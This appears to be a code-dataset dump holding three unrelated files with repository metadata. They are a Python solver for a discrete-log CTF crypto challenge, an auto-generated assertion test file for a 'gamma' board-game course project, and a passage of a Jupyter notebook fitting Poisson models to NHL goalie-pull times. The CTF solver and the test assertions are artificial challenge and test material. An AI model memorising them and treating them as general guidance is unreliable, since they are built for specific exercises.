|
7baca0df1ca96a00de77a1a113a0011c43ad6ab8
|
[
"MIT"
] | null | null | null |
# Solver for a DLP-style CTF challenge ("dlppp", BSides Ahmedabad 2021).
from math import ceil, sqrt  # NOTE(review): unused here -- likely left over from exploration
from Crypto.Util.number import long_to_bytes
# Reference : https://bomotodo.wordpress.com/2017/04/09/asis-quals-2017-dlp-158-points/
# p: the challenge's prime modulus.
p = 0xa1c8e1e9b2301cb1f5d424ec6d959d7f275e11507b2177d55f3dc1268c9a3164b72832f362975023f09623814f80fe0ffad179d0e51c40b8a1f882d1f5f28e71
# y: the challenge's group element, presumably y = g^flag mod p^2 with a
# generator g congruent to 1 + p -- TODO confirm against the challenge source.
y = 0x6fa0fcc8c9c5f695a5709243698d7640c27c45352375919d538137333ab3a2c748cae5e7c1294d6ffc4007476f6fec6421c992f9fe1919b381306300caa2260953e48f2ec0de7b8c6417faa42001a748b1b367f5211095ddd6bf4e681f7e7ad787e0a7f562f6f0307d6a8d7e8d18cd59bd7572f0c4f430f0fd4fc61503b203f3bcd6dd0b0f84bbdbd42126d95b525fe77e4be62c6dbd083dbcaa284b20a9ea6faf9cbaf20dd88b0180417c9021fa1dcb52b2348c4376bd6b9b38a6c860086af
# Binomial trick: (1 + p)^m = 1 + m*p (mod p^2), so the exponent is recovered
# directly as ((y mod p^2) - 1) / p -- no general discrete log needed.
flag = ((y % (p**2)) - 1)//p
print("[+] Flag : " + str(long_to_bytes(flag)))
| 69.636364
| 389
| 0.891645
| 44
| 766
| 15.431818
| 0.75
| 0.017673
| 0.032401
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.46922
| 0.045692
| 766
| 10
| 390
| 76.6
| 0.459644
| 0.110966
| 0
| 0
| 0
| 0
| 0.0162
| 0
| 0
| 1
| 0.758468
| 0.1
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0.166667
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
8907c4e3355ea5e8cb189f280fbb26162a96c422
| 10,337
|
py
|
Python
|
z2/part2/interactive/jm/random_normal_1/151224417.py
|
kozakusek/ipp-2020-testy
|
09aa008fa53d159672cc7cbf969a6b237e15a7b8
|
[
"MIT"
] | 1
|
2020-04-16T12:13:47.000Z
|
2020-04-16T12:13:47.000Z
|
z2/part2/interactive/jm/random_normal_1/151224417.py
|
kozakusek/ipp-2020-testy
|
09aa008fa53d159672cc7cbf969a6b237e15a7b8
|
[
"MIT"
] | 18
|
2020-03-06T17:50:15.000Z
|
2020-05-19T14:58:30.000Z
|
z2/part2/interactive/jm/random_normal_1/151224417.py
|
kozakusek/ipp-2020-testy
|
09aa008fa53d159672cc7cbf969a6b237e15a7b8
|
[
"MIT"
] | 18
|
2020-03-06T17:45:13.000Z
|
2020-06-09T19:18:31.000Z
|
from part1 import (
gamma_board,
gamma_busy_fields,
gamma_delete,
gamma_free_fields,
gamma_golden_move,
gamma_golden_possible,
gamma_move,
gamma_new,
)
"""
scenario: test_random_actions
uuid: 151224417
"""
"""
random actions, total chaos
"""
board = gamma_new(8, 8, 6, 5)
assert board is not None
assert gamma_move(board, 1, 5, 7) == 1
assert gamma_move(board, 1, 5, 7) == 0
assert gamma_move(board, 2, 1, 5) == 1
assert gamma_move(board, 3, 0, 4) == 1
assert gamma_busy_fields(board, 3) == 1
assert gamma_move(board, 4, 5, 7) == 0
assert gamma_move(board, 4, 1, 0) == 1
assert gamma_busy_fields(board, 4) == 1
assert gamma_move(board, 5, 4, 7) == 1
assert gamma_move(board, 6, 7, 0) == 1
assert gamma_move(board, 1, 0, 5) == 1
assert gamma_busy_fields(board, 1) == 2
assert gamma_move(board, 2, 4, 6) == 1
assert gamma_golden_possible(board, 2) == 1
assert gamma_move(board, 3, 1, 4) == 1
assert gamma_move(board, 4, 0, 0) == 1
board539143392 = gamma_board(board)
assert board539143392 is not None
assert board539143392 == ("....51..\n"
"....2...\n"
"12......\n"
"33......\n"
"........\n"
"........\n"
"........\n"
"44.....6\n")
del board539143392
board539143392 = None
assert gamma_move(board, 5, 1, 0) == 0
assert gamma_move(board, 6, 0, 4) == 0
assert gamma_move(board, 1, 0, 3) == 1
assert gamma_move(board, 1, 5, 1) == 1
board965567065 = gamma_board(board)
assert board965567065 is not None
assert board965567065 == ("....51..\n"
"....2...\n"
"12......\n"
"33......\n"
"1.......\n"
"........\n"
".....1..\n"
"44.....6\n")
del board965567065
board965567065 = None
assert gamma_move(board, 2, 2, 1) == 1
assert gamma_golden_possible(board, 2) == 1
assert gamma_move(board, 3, 7, 2) == 1
assert gamma_free_fields(board, 3) == 50
assert gamma_move(board, 4, 6, 3) == 1
assert gamma_move(board, 4, 7, 4) == 1
assert gamma_move(board, 5, 5, 1) == 0
assert gamma_move(board, 5, 6, 1) == 1
assert gamma_move(board, 6, 3, 7) == 1
assert gamma_move(board, 1, 2, 0) == 1
assert gamma_move(board, 1, 7, 0) == 0
assert gamma_move(board, 2, 2, 7) == 1
board809363724 = gamma_board(board)
assert board809363724 is not None
assert board809363724 == ("..2651..\n"
"....2...\n"
"12......\n"
"33.....4\n"
"1.....4.\n"
".......3\n"
"..2..15.\n"
"441....6\n")
del board809363724
board809363724 = None
assert gamma_move(board, 3, 4, 3) == 1
assert gamma_move(board, 4, 0, 0) == 0
assert gamma_move(board, 5, 6, 0) == 1
assert gamma_free_fields(board, 5) == 42
board825369756 = gamma_board(board)
assert board825369756 is not None
assert board825369756 == ("..2651..\n"
"....2...\n"
"12......\n"
"33.....4\n"
"1...3.4.\n"
".......3\n"
"..2..15.\n"
"441...56\n")
del board825369756
board825369756 = None
assert gamma_move(board, 6, 2, 4) == 1
assert gamma_move(board, 6, 2, 7) == 0
assert gamma_move(board, 1, 2, 5) == 0
assert gamma_move(board, 1, 3, 6) == 0
assert gamma_move(board, 2, 5, 7) == 0
assert gamma_move(board, 2, 1, 2) == 1
assert gamma_move(board, 3, 3, 5) == 1
assert gamma_move(board, 4, 0, 4) == 0
assert gamma_move(board, 5, 7, 0) == 0
assert gamma_move(board, 5, 3, 3) == 1
assert gamma_move(board, 6, 4, 5) == 1
assert gamma_move(board, 1, 3, 2) == 0
assert gamma_move(board, 2, 1, 4) == 0
assert gamma_move(board, 3, 1, 1) == 1
assert gamma_move(board, 4, 2, 6) == 1
assert gamma_move(board, 4, 5, 5) == 1
assert gamma_move(board, 5, 0, 4) == 0
assert gamma_move(board, 6, 5, 2) == 1
assert gamma_move(board, 6, 4, 4) == 1
board847746538 = gamma_board(board)
assert board847746538 is not None
assert board847746538 == ("..2651..\n"
"..4.2...\n"
"12.364..\n"
"336.6..4\n"
"1..53.4.\n"
".2...6.3\n"
".32..15.\n"
"441...56\n")
del board847746538
board847746538 = None
assert gamma_move(board, 1, 4, 2) == 0
assert gamma_move(board, 1, 5, 0) == 1
assert gamma_move(board, 2, 1, 0) == 0
assert gamma_move(board, 2, 3, 0) == 0
assert gamma_golden_move(board, 2, 7, 4) == 0
assert gamma_move(board, 3, 3, 5) == 0
assert gamma_move(board, 4, 0, 4) == 0
assert gamma_free_fields(board, 4) == 12
assert gamma_move(board, 5, 6, 2) == 1
assert gamma_free_fields(board, 5) == 30
assert gamma_move(board, 6, 6, 5) == 0
assert gamma_golden_possible(board, 6) == 1
assert gamma_move(board, 1, 6, 7) == 1
assert gamma_free_fields(board, 1) == 9
assert gamma_move(board, 2, 5, 7) == 0
assert gamma_move(board, 2, 2, 3) == 0
assert gamma_move(board, 3, 7, 3) == 1
assert gamma_move(board, 4, 6, 3) == 0
assert gamma_move(board, 5, 1, 0) == 0
assert gamma_move(board, 5, 7, 1) == 1
assert gamma_move(board, 1, 2, 4) == 0
assert gamma_move(board, 1, 6, 1) == 0
assert gamma_free_fields(board, 1) == 9
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 3, 2, 5) == 1
assert gamma_move(board, 4, 2, 2) == 0
assert gamma_move(board, 4, 2, 3) == 0
assert gamma_move(board, 5, 0, 4) == 0
assert gamma_move(board, 5, 7, 1) == 0
assert gamma_free_fields(board, 5) == 26
assert gamma_move(board, 6, 1, 4) == 0
assert gamma_move(board, 6, 7, 1) == 0
assert gamma_busy_fields(board, 6) == 6
assert gamma_move(board, 1, 2, 4) == 0
assert gamma_move(board, 2, 3, 5) == 0
assert gamma_golden_possible(board, 2) == 1
assert gamma_move(board, 3, 6, 5) == 0
assert gamma_move(board, 4, 2, 3) == 0
assert gamma_move(board, 5, 6, 0) == 0
assert gamma_move(board, 5, 5, 0) == 0
assert gamma_move(board, 6, 2, 3) == 1
assert gamma_move(board, 6, 2, 5) == 0
assert gamma_golden_possible(board, 6) == 1
assert gamma_move(board, 1, 0, 3) == 0
assert gamma_move(board, 2, 0, 3) == 0
assert gamma_golden_move(board, 2, 3, 0) == 0
assert gamma_move(board, 3, 6, 4) == 0
assert gamma_move(board, 4, 5, 7) == 0
assert gamma_free_fields(board, 4) == 9
assert gamma_move(board, 5, 0, 2) == 1
assert gamma_move(board, 5, 3, 7) == 0
assert gamma_busy_fields(board, 5) == 7
assert gamma_move(board, 6, 5, 6) == 0
assert gamma_move(board, 6, 2, 7) == 0
assert gamma_move(board, 1, 1, 2) == 0
assert gamma_move(board, 2, 2, 3) == 0
assert gamma_move(board, 3, 7, 7) == 0
assert gamma_move(board, 4, 7, 1) == 0
assert gamma_move(board, 5, 1, 0) == 0
assert gamma_move(board, 6, 1, 0) == 0
assert gamma_move(board, 6, 0, 6) == 0
board308154158 = gamma_board(board)
assert board308154158 is not None
assert board308154158 == ("..26511.\n"
"..4.2...\n"
"123364..\n"
"336.6..4\n"
"1.653.43\n"
"52...653\n"
".32..155\n"
"441..156\n")
del board308154158
board308154158 = None
assert gamma_move(board, 1, 4, 3) == 0
assert gamma_move(board, 1, 4, 0) == 1
assert gamma_move(board, 2, 6, 0) == 0
assert gamma_move(board, 2, 1, 4) == 0
assert gamma_move(board, 3, 4, 5) == 0
assert gamma_move(board, 4, 0, 4) == 0
assert gamma_move(board, 5, 2, 4) == 0
assert gamma_move(board, 5, 4, 3) == 0
assert gamma_move(board, 6, 6, 7) == 0
assert gamma_move(board, 1, 2, 5) == 0
assert gamma_move(board, 1, 5, 2) == 0
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 6, 0) == 0
assert gamma_move(board, 2, 5, 5) == 0
assert gamma_free_fields(board, 2) == 7
assert gamma_move(board, 3, 1, 0) == 0
assert gamma_busy_fields(board, 3) == 8
assert gamma_move(board, 4, 6, 5) == 1
assert gamma_move(board, 5, 6, 6) == 1
assert gamma_free_fields(board, 5) == 5
assert gamma_move(board, 6, 7, 6) == 0
assert gamma_move(board, 6, 1, 6) == 0
assert gamma_free_fields(board, 6) == 7
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 6, 0) == 0
assert gamma_move(board, 2, 2, 6) == 0
assert gamma_busy_fields(board, 2) == 5
assert gamma_move(board, 3, 4, 6) == 0
assert gamma_move(board, 3, 0, 7) == 0
assert gamma_move(board, 4, 4, 6) == 0
assert gamma_golden_move(board, 4, 6, 6) == 1
assert gamma_busy_fields(board, 5) == 7
assert gamma_move(board, 6, 2, 0) == 0
assert gamma_move(board, 2, 7, 1) == 0
assert gamma_move(board, 3, 7, 0) == 0
assert gamma_free_fields(board, 3) == 6
assert gamma_move(board, 5, 6, 1) == 0
assert gamma_move(board, 5, 0, 6) == 1
assert gamma_move(board, 6, 6, 3) == 0
assert gamma_move(board, 6, 0, 6) == 0
assert gamma_move(board, 1, 7, 7) == 1
assert gamma_move(board, 2, 4, 5) == 0
assert gamma_move(board, 2, 5, 1) == 0
assert gamma_busy_fields(board, 2) == 5
assert gamma_move(board, 3, 1, 1) == 0
assert gamma_busy_fields(board, 3) == 8
assert gamma_move(board, 4, 1, 5) == 0
assert gamma_move(board, 5, 2, 5) == 0
assert gamma_free_fields(board, 5) == 5
assert gamma_move(board, 6, 6, 7) == 0
assert gamma_move(board, 6, 1, 3) == 1
assert gamma_golden_possible(board, 6) == 1
assert gamma_move(board, 1, 6, 3) == 0
assert gamma_move(board, 1, 6, 7) == 0
assert gamma_move(board, 2, 4, 3) == 0
assert gamma_move(board, 2, 2, 3) == 0
assert gamma_free_fields(board, 2) == 6
assert gamma_move(board, 3, 4, 6) == 0
assert gamma_move(board, 4, 7, 5) == 1
assert gamma_move(board, 5, 2, 4) == 0
assert gamma_move(board, 6, 4, 5) == 0
assert gamma_move(board, 6, 4, 7) == 0
assert gamma_move(board, 1, 4, 6) == 0
assert gamma_move(board, 1, 3, 7) == 0
assert gamma_golden_move(board, 1, 3, 2) == 0
assert gamma_move(board, 2, 3, 5) == 0
assert gamma_move(board, 2, 7, 2) == 0
assert gamma_move(board, 3, 2, 2) == 0
assert gamma_move(board, 4, 1, 0) == 0
assert gamma_move(board, 4, 1, 5) == 0
assert gamma_move(board, 5, 3, 6) == 0
assert gamma_move(board, 6, 3, 7) == 0
assert gamma_golden_move(board, 6, 0, 0) == 0
assert gamma_move(board, 1, 7, 1) == 0
assert gamma_move(board, 1, 2, 0) == 0
assert gamma_move(board, 2, 6, 1) == 0
assert gamma_move(board, 3, 4, 5) == 0
assert gamma_move(board, 3, 2, 0) == 0
assert gamma_move(board, 5, 4, 3) == 0
assert gamma_move(board, 5, 3, 4) == 1
assert gamma_free_fields(board, 5) == 4
assert gamma_move(board, 6, 6, 7) == 0
assert gamma_golden_move(board, 6, 2, 1) == 0
assert gamma_move(board, 1, 5, 2) == 0
assert gamma_move(board, 2, 4, 1) == 0
assert gamma_move(board, 3, 6, 5) == 0
assert gamma_move(board, 4, 2, 4) == 0
assert gamma_move(board, 6, 4, 5) == 0
assert gamma_move(board, 6, 2, 4) == 0
assert gamma_busy_fields(board, 6) == 8
assert gamma_free_fields(board, 6) == 5
assert gamma_move(board, 1, 2, 0) == 0
assert gamma_move(board, 2, 0, 3) == 0
assert gamma_move(board, 2, 4, 6) == 0
gamma_delete(board)
| 32.303125
| 46
| 0.641192
| 1,909
| 10,337
| 3.328444
| 0.034573
| 0.363551
| 0.396601
| 0.528801
| 0.846553
| 0.839314
| 0.754171
| 0.508499
| 0.455461
| 0.433743
| 0
| 0.140369
| 0.177808
| 10,337
| 319
| 47
| 32.404389
| 0.607248
| 0
| 0
| 0.345763
| 0
| 0
| 0.046834
| 0
| 0
| 0
| 0
| 0
| 0.755932
| 1
| 0
| false
| 0
| 0.00339
| 0
| 0.00339
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8f233fae9c9ead7b9772084976e5b2720f042e5a
| 57,621
|
py
|
Python
|
notebooks/py/dev_4_bayes_poisson.py
|
agalea91/nhl-goalie-pull-optimization
|
7e57d50163c5f96a22dd5afd96c6e1ba5487c600
|
[
"MIT"
] | null | null | null |
notebooks/py/dev_4_bayes_poisson.py
|
agalea91/nhl-goalie-pull-optimization
|
7e57d50163c5f96a22dd5afd96c6e1ba5487c600
|
[
"MIT"
] | null | null | null |
notebooks/py/dev_4_bayes_poisson.py
|
agalea91/nhl-goalie-pull-optimization
|
7e57d50163c5f96a22dd5afd96c6e1ba5487c600
|
[
"MIT"
] | 2
|
2019-06-06T10:37:48.000Z
|
2021-03-31T18:28:43.000Z
|
# coding: utf-8
# %load jupyter_default.py
import pandas as pd
import numpy as np
import os
import re
import datetime
import time
import glob
from tqdm import tqdm_notebook
from colorama import Fore, Style
get_ipython().run_line_magic('matplotlib', 'inline')
import matplotlib.pyplot as plt
import matplotlib.colors
import seaborn as sns
get_ipython().run_line_magic('config', "InlineBackend.figure_format='retina'")
sns.set() # Revert to matplotlib defaults
plt.rcParams['figure.figsize'] = (12, 8)
plt.rcParams['axes.labelpad'] = 20
plt.rcParams['legend.fancybox'] = True
plt.style.use('ggplot')
SMALL_SIZE, MEDIUM_SIZE, BIGGER_SIZE = 14, 16, 20
plt.rc('font', size=SMALL_SIZE)
plt.rc('axes', titlesize=SMALL_SIZE)
plt.rc('axes', labelsize=MEDIUM_SIZE)
plt.rc('xtick', labelsize=SMALL_SIZE)
plt.rc('ytick', labelsize=SMALL_SIZE)
plt.rc('legend', fontsize=MEDIUM_SIZE)
plt.rc('axes', titlesize=BIGGER_SIZE)
def savefig(plt, name):
    """Save the current figure of ``plt`` as ../../figures/<name>.png.

    Uses print-quality settings (300 dpi, tight bounding box).
    """
    target = f'../../figures/{name}.png'
    plt.savefig(target, bbox_inches='tight', dpi=300)
get_ipython().run_line_magic('load_ext', 'version_information')
get_ipython().run_line_magic('version_information', 'pandas, numpy')
# ## Bayesian Modeling Discussion
#
# We can model the probability of an outcome $y$ as $P_t(y)$ using a discrete **Poisson distribution** i.e. if discretizing the time $t$ in seconds.
#
# $$
# P_t(\mu) = \frac{\mu^te^{-\mu}}{k!}
# $$
#
# Instead we could also assume a Gamma posterior, which has the advantage of being continuous and has more parameters than can be optimized. For now we'll stick with using the simpler Poisson distribution.
#
# Based on a set of goalie pull observations $X$ from 2003-2007 NHL games, we'll solve for the posterior distribution $P_t(y|X)$, the probability of the outcome $y$, given the observations. This is done computationally using markov chain monte carlo and the `pymc3` library.
#
# The outcomes we're interested in are $y = \big\{\mathrm{goal\;for}, \mathrm{goal\;against}, \mathrm{no\;goal}\big\}$.
#
# We'll use a **uniform prior** over the domain of times (last 5mins). Note: when gathering the observations, we throw out goalie pulls greater than 5 minutes from the end of the game (due to high likelihood of false positives when parsing goalie pulls from the raw game table).
#
# Once we find the posteriors discussed above, we can study the risk reward of pulling a goalie. We'll compare posteriors to find the odds of scoring a goal (and the odds of getting scored on) over time $t$ where:
# - **t = Time elapsed** e.g. if there's 3 minutes left, what is the chance that pulling the goalie will result in a goal for?
# - **t = Time since goalie pull** e.g. after the goalie has been pulled for 1 minute, what is the chance of getting a goal?
import pymc3 as pm
# ### Load the training data
ls ../../data/processed/pkl/
def load_data():
    """Concatenate every processed pickle under ../../data/processed/pkl/
    into one DataFrame (files are read in sorted order)."""
    paths = sorted(glob.glob('../../data/processed/pkl/*.pkl'))
    print(paths)
    return pd.concat((pd.read_pickle(path) for path in paths))
def clean_df(df):
    """Return a copy of ``df`` with early-game rows removed.

    Drops rows whose ``goal_for_time`` is before the 15-minute mark, and --
    when the column exists -- rows whose ``game_end_time`` is as well.
    Rows with missing (NaT) times survive both filters, because NaT
    comparisons evaluate to False.
    """
    cutoff = datetime.timedelta(seconds=15 * 60)
    cleaned = df.copy()
    before = cleaned.shape[0]
    print('Removing goal_for_time < 15 mins')
    cleaned = cleaned[~(cleaned.goal_for_time < cutoff)]
    print(f'Removed {before - cleaned.shape[0]} total rows')
    if 'game_end_time' in df.columns:
        before = cleaned.shape[0]
        print('Removing game_end_time < 15 mins')
        cleaned = cleaned[~(cleaned.game_end_time < cutoff)]
        print(f'Removed {before - cleaned.shape[0]} total rows')
    return cleaned
df = load_data()
df = clean_df(df)
def load_training_samples(
    df,
    cols,
    masks=None,
    dtype='timedelta64[s]'
) -> np.ndarray:
    '''
    Return buckets of training data.

    One numpy bucket per entry of ``cols``: the column is optionally
    restricted by a boolean mask, NaNs are dropped, and the values cast
    to ``dtype``.

    Parameters
    ----------
    df : pandas.DataFrame
        Source table.
    cols : list of str
        Column names to extract.
    masks : list, optional
        Per-column boolean masks; a ``None`` entry (or omitting the
        argument entirely) selects the full column.
        Fixed: the default was the mutable ``masks=[]`` -- it was only
        read, never mutated, but ``None`` is the safe idiom and the
        ``if not masks`` check treats both identically.
    dtype : str
        Target dtype for the extracted values.
    '''
    if not masks:
        masks = [None] * len(cols)
    out = []
    for col, m in zip(cols, masks):
        if m is None:
            d = df[col].dropna().astype(dtype).values
        else:
            d = df[col][m].dropna().astype(dtype).values
        out.append(d)
        print(f'Loaded {len(d)} samples for col {col}')
    # NOTE: columns are assumed to yield equally long buckets; ragged
    # lengths would produce an object array here.
    out = np.array(out)
    print(f'Training data shape = {out.shape}')
    return out
# ### Rough work
# #### Data loading
# NOTE(review): exact duplicate of the load_training_samples defined earlier
# in this notebook export; this later definition simply re-binds the name.
def load_training_samples(
    df,
    cols,
    masks=[],  # NOTE(review): mutable default -- only read here, but fragile
    dtype='timedelta64[s]'
) -> np.ndarray:
    '''
    Return buckets of training data.

    One numpy bucket per entry of ``cols``: each column is optionally
    restricted by the matching boolean mask, NaNs dropped, and values
    cast to ``dtype``.
    '''
    if not masks:
        masks = [None] * len(cols)
    out = []
    for col, m in zip(cols, masks):
        if m is None:
            d = df[col].dropna().astype(dtype).values
        else:
            d = df[col][m].dropna().astype(dtype).values
        out.append(d)
        print(f'Loaded {len(d)} samples for col {col}')
    out = np.array(out)
    print(f'Training data shape = {out.shape}')
    return out
# Let's start by modeling the 5 on 6 goal times in 3rd period, where time is a continuous (or rather, discretized by second) and measured in minutes.
features = ['goal_for_time', 'goal_against_time']
training_samples = load_training_samples(df, features)
training_samples[0].shape
training_samples[0][:10]
# To get the proper probabilities, we should weight the
# #### Modeling
# with pm.Model() as model:
# prior_goal_for = pm.Uniform('prior_goal_for', 15, 20)
# prior_goal_against = pm.Uniform('prior_goal_against', 15, 20)
# obs_goal_for = pm.Gamma('obs_goal_for', observed=training_samples[0])
# need to set up priors for all the parameters of the gamma!...
# THINK ABOUT IT
from scipy.stats import poisson
get_ipython().run_line_magic('pinfo', 'poisson')
# ```
# pmf(k, mu, loc=0)
# Probability mass function.
# ```
x = np.arange(0, 20, 1)
y = [poisson.pmf(_x, 1, 1)
for _x in x]
plt.plot(x, y)
def bayes_model(training_samples):
    """Build the Poisson goal-time model and draw MCMC samples.

    ``training_samples[0]`` / ``[1]`` hold the observed goal-for /
    goal-against times in seconds.  Returns ``(model, trace)``.
    """
    with pm.Model() as model:
        # Uniform priors over the last five minutes (15*60..20*60 s) for the
        # Poisson rate mu of each outcome; mu is also the Poisson mean.
        prior_for = pm.Uniform('mu_goal_for', 15 * 60, 20 * 60)
        prior_against = pm.Uniform('mu_goal_against', 15 * 60, 20 * 60)
        # Condition each Poisson on the observed goal times.
        pm.Poisson('obs_goal_for', prior_for, observed=training_samples[0])
        pm.Poisson('obs_goal_against', prior_against, observed=training_samples[1])
        # Unobserved goal-time variables, sampled alongside the priors.
        pm.Poisson('p_goal_for', prior_for)
        pm.Poisson('p_goal_against', prior_against)
        # Metropolis sampling, 18k draws.
        trace = pm.sample(18000, step=pm.Metropolis())
    return model, trace
# N = 10
# test_training_samples = np.array([training_samples[0][:N],
# training_samples[1][:N]])
# model, trace, burned_trace = bayes_model(test_training_samples)
# model
model, trace = bayes_model(training_samples)
model
N_burn = 10000
burned_trace = trace[N_burn:]
get_ipython().run_line_magic('pinfo', 'pm.plots.traceplot')
pm.plots.traceplot(trace=trace, varnames=['p_goal_for', 'p_goal_against'])
# What do red and blue represent?
pm.plots.plot_posterior(trace=trace['p_goal_for'])
pm.plots.plot_posterior(trace=trace['p_goal_against'])
# The HDR is really interesting! For the above case (normally distributed data), the HDR is pretty much equivalent to the SD based confience interval. However it generalizes to more complicated distributions
#
# https://stats.stackexchange.com/questions/148439/what-is-a-highest-density-region-hdr
# e.g.
#
# 
ALPHA = 0.6
plt.hist(burned_trace['mu_goal_for'], bins=50,
color='green', label='mu_goal_for',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['mu_goal_against'], bins=50,
color='red', label='mu_goal_against',
histtype='stepfilled', alpha=ALPHA)
plt.ylabel('MCMC counts')
plt.xlabel('$\mu$ (seconds)')
plt.legend();
plt.plot(trace['mu_goal_for'], label='mu_goal_for', color='green')
plt.plot(trace['mu_goal_against'], label='mu_goal_against', color='red')
plt.ylabel('$\mu$ (seconds)')
plt.xlabel('MCMC step')
plt.axvline(N_burn, color='black', lw=2, label='Burn threshold')
plt.legend();
# Include both those plots in blog ^
from scipy.special import factorial
poisson = lambda mu, k: mu**k * np.exp(-mu) / factorial(k)
poisson(0.5, np.array([1, 4, 5, 2]))
from scipy.stats import poisson
get_ipython().run_line_magic('pinfo', 'poisson.pmf')
poisson.pmf(3, 1)
poisson.pmf(np.array([1, 4, 3]), 1)
p = poisson.pmf
# poisson = lambda k, mu: mu**k * np.exp(-mu) / factorial(k)
x = np.arange(16, 22, 1)
mu_goal_for = burned_trace['mu_goal_for'].mean() / 60
y_goal_for = p(x, mu_goal_for)
mu_goal_against = burned_trace['mu_goal_against'].mean() / 60
y_goal_against = p(x, mu_goal_against)
plt.plot(x, y_goal_for, label=r'$P(\rm{goal\;for};\mu_{avg})$', color='green')
plt.plot(x, y_goal_against, label=r'$P(\rm{goal\;against};\mu_{avg})$', color='red')
p = poisson.pmf
# poisson = lambda k, mu: mu**k * np.exp(-mu) / factorial(k)
x = np.arange(16*60, 22*60, 1)
mu_goal_for = burned_trace['mu_goal_for'].mean()
y_goal_for = p(x, mu_goal_for)
mu_goal_against = burned_trace['mu_goal_against'].mean()
y_goal_against = p(x, mu_goal_against)
plt.plot(x, y_goal_for, label=r'$P(\rm{goal\;for};\mu_{avg})$', color='green')
plt.plot(x, y_goal_against, label=r'$P(\rm{goal\;against};\mu_{avg})$', color='red')
ALPHA = 0.6
LW = 3
# plt.hist(burned_trace['p_goal_for'] / 60, bins=50,
# color='green', label=r'$P(\rm{goal\;for}\;|\;\rm{goalie\;pulled})$',
# histtype='stepfilled', alpha=ALPHA)
# plt.hist(burned_trace['p_goal_against'] / 60, bins=50,
# color='red', label=r'$P(\rm{goal\;against}\;|\;\rm{goalie\;pulled})$',
# histtype='stepfilled', alpha=ALPHA)
''' Plot the MCMC samples '''
plt.hist(burned_trace['p_goal_for'] / 60, bins=50,
color='green', label='p_goal_for samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['p_goal_against'] / 60, bins=50,
color='red', label='p_goal_against samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
''' Plot the poisson distributions '''
p = poisson.pmf
x = np.arange(16*60, 22*60, 1)
mu_goal_for = burned_trace['mu_goal_for'].mean()
mu_goal_against = burned_trace['mu_goal_against'].mean()
y_goal_for = p(x, mu_goal_for)
y_goal_against = p(x, mu_goal_against)
# Convert into minutes and rescale to fit chart
x = x / 60
scale_frac = 0.7
y_goal_for = y_goal_for / y_goal_for.max() * scale_frac
y_goal_against = y_goal_against / y_goal_against.max() * scale_frac
plt.plot(x, y_goal_for, label=r'$P(\rm{goal\;for};\mu_{MCMC})$', color='green', lw=LW)
plt.plot(x, y_goal_against, label=r'$P(\rm{goal\;against};\mu_{MCMC})$', color='red', lw=LW)
plt.ylabel('Counts')
# plt.yticks([])
plt.xlabel('Game clock (3rd period)')
plt.legend();
# (Do not include this plot ^ in blog, but re-use source code)
# In reality, the probability of an empty net goal should be zero after 20 minutes (since the period is over). We would also need to normalize the probabilities such that
#
# $
# \sum_t \big{[} P(\mathrm{goal\;for}; \mu, t) + P(\mathrm{goal\;against}; \mu, t) + P(\mathrm{game\;end}) \big{]} = 1
# $
#
# Since this was just a toy model to get us warmed up with `pymc`, let's just leave this and move on to a more interesting problem.
# ---
# #### Re-loead better training samples
# I wonder if we can answer the question: **what are the odds of scoring a goal based on when the goalie is pulled?**
#
# It's probably best to decide that based on the "time since goalie pull" metric and the time remaining in the game. For the chart above, the goal for probability is clearly shifted to the left - however this does not mean that pulling a goalie at the 19 minute mark will have lower odds of a good outcome than pulling at the 18 minute mark. This chart is just a litlihood of scoring given the goalie pull times.
#
# What we should do is label the goalie pull times with the eventual outcome, then model that.
df.columns
# Load time of pull for eventual outcomes:
feature_names = ['goal_for', 'goal_against']
# Logic for loading the data
features = ['pull_time', 'pull_time']
masks = [~(df.goal_for_time.isnull()), ~(df.goal_against_time.isnull())]
training_samples = load_training_samples(df, features, masks)
def bayes_model(training_samples) -> tuple:
    """
    Solve for posterior distributions using pymc3.

    Parameters
    ----------
    training_samples : sequence of arrays
        training_samples[0] = goalie-pull times (seconds) for games that
        ended in a goal for; training_samples[1] = same for goal against.

    Returns
    -------
    (model, trace) : the pymc3 Model and the Metropolis MCMC trace.
    """
    with pm.Model() as model:
        # Priors for the mu parameter of the poisson distribution
        # Note that mu = mean(Poisson)
        mu_goal_for = pm.Uniform('mu_goal_for', 15*60, 20*60)
        mu_goal_against = pm.Uniform('mu_goal_against', 15*60, 20*60)
        # Observations
        obs_goal_for = pm.Poisson('obs_goal_for', mu_goal_for, observed=training_samples[0])
        obs_goal_against = pm.Poisson('obs_goal_against', mu_goal_against, observed=training_samples[1])
        # Priors for the goal probabilities
        p_goal_for = pm.Poisson('p_goal_for', mu_goal_for)
        p_goal_against = pm.Poisson('p_goal_against', mu_goal_against)
        # Fit model
        step = pm.Metropolis()
        trace = pm.sample(18000, step=step)
    return model, trace
model, trace = bayes_model(training_samples)
model
N_burn = 10000
burned_trace = trace[N_burn:]
plt.plot(trace['mu_goal_for'], label='mu_goal_for', color='green')
plt.plot(trace['mu_goal_against'], label='mu_goal_against', color='red')
plt.ylabel('$\mu$ (seconds)')
plt.xlabel('MCMC step')
plt.axvline(N_burn, color='black', lw=2, label='Burn threshold')
plt.legend();
ALPHA = 0.6
plt.hist(burned_trace['mu_goal_for'], bins=50,
color='green', label='mu_goal_for',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['mu_goal_against'], bins=50,
